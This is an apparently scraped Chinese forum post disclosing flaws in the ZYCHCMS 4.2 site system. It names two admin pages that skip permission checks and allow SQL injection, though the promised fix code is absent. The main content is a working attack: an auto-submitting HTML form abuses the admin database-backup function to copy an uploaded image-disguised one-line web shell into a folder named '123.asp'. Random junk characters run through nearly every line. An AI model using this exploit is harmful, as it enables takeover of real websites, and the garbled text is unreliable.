) x" n3 R) v% m9 c
) O, R& p; k& |# W5 O
4 z& x, w+ @! u6 v# ]: y0 O
9 _9 {! B/ a% F& b) H& j$ `
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
8 @2 K6 g# m" @" L. f' U ①SQL注射漏洞
' a5 k+ ?$ L6 s/ V2 i# A* D% F6 _ 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp: s9 F. [: O3 r, j- E) D
漏洞原因:未过滤7 m% q2 W# [# Q' S0 L% O G
漏洞代码:
+ ]8 w' M; ?3 d J2 u 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
0 h. U6 C) p2 _- v! O4 Y1 L1 o 修复方法:在文件开头加入代码
/ P4 y( o# B0 Q& y h/ u
( [7 u* g- |8 g! R. j
* B. M, q9 m. d7 [+ R' Y②后台拿WBSHELL! s$ i3 ]/ ^( G: d8 h1 g
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
$ |, j1 @0 t3 f5 r 这里在网上找了一个,改了下,将就着用。
, `+ S/ p4 M ]+ u 以下是代码本地提交代码
- _. _9 A: [7 x + D/ C$ j6 N1 A( b/ f% d/ `
' x) t+ P9 E. I$ u4 r<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>1 ?3 I; V; L% L
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>* Z0 [% P8 k' @' Q; [' T t
<tr>
( A4 L# T. T1 D0 F% u/ T <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>6 e: z+ w8 P5 K1 r* o' y* T
</tr>
$ D) b' Y/ _1 g8 _ <tr>
" U/ }$ k9 Z6 }; B <td bgcolor=”#FFFFFF”><span class=”back_southidc”>3 L7 P! X5 b I" q! c c
</span>; Y2 j' P) ` Z6 q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
" G0 e; C9 w- k8 l0 q2 I <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
; e. x1 u% L7 Y) x <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
* |/ ~0 c. G. l. q <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
7 F/ l0 k7 P3 L' |. }8 } <div align=”left”>- t2 n2 |* w0 I" Q# j" c
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />. |- N7 I$ v2 r s
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
' n$ T$ Y5 N8 E" i g <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />; L: ?; d I6 C
</div></td>, V$ Y( G' ~4 C
</tr>4 |8 B+ z s3 j4 A' d
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
, G0 J+ X+ M/ B <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>' b9 ^% W% j5 b
<td class=”td”><div align=”left”>* X+ U1 W8 M# m$ f: d8 s
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />9 l9 g+ B& i% u
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
! H* x. f, S& ~1 s8 S! V& U1 k </tr>
" ?8 X' F% K& \& T0 I3 q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>8 L4 O7 J2 S5 q! n6 G
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>+ M+ f. A5 I1 N% V3 p2 M
<td class=”td”><div align=”left”>
$ t+ ]7 N# M* o. A; e& z" N6 n <input type=”submit” value=”确定备份” class=”btn”- h! l- C% N. r* ^1 V
</div></td>
" z$ d) Q# ^ A$ }5 w( Q </tr>
# x! v9 b8 Z* B( F </table></td></tr></form>
) N S% y% r: [5 ?! x </table>
+ D- X9 Q, |9 Z, J/ g+ h </td>
( Z3 U6 C7 E4 s0 I$ |# }! A </tr>$ ~. t' e" E3 L% z; q3 d- y
</table>0 k1 _! X/ b3 m
<script>/ V1 P% c2 J$ l0 {
document.all.add.submit();
3 b9 y% U4 {/ b% m </script>' T/ b( w/ T& K: H0 m8 a: M0 U+ f
+ {" D' F1 w% r1 A% w
( c/ \- p+ W3 B g/ C3 b G! g3 I. o/ R
& E1 h5 }( }! U; Q- y2 G
7 o& G1 W: l* I5 `. M
2 K+ C% x1 z/ x- g* z" ]0 \4 e1 L; ^4 _8 w& c7 x
8 x8 M ~. q* c. D- H
9 |- ?1 q4 {8 d
, B9 a) F" v5 B' J3 ]$ W- K
|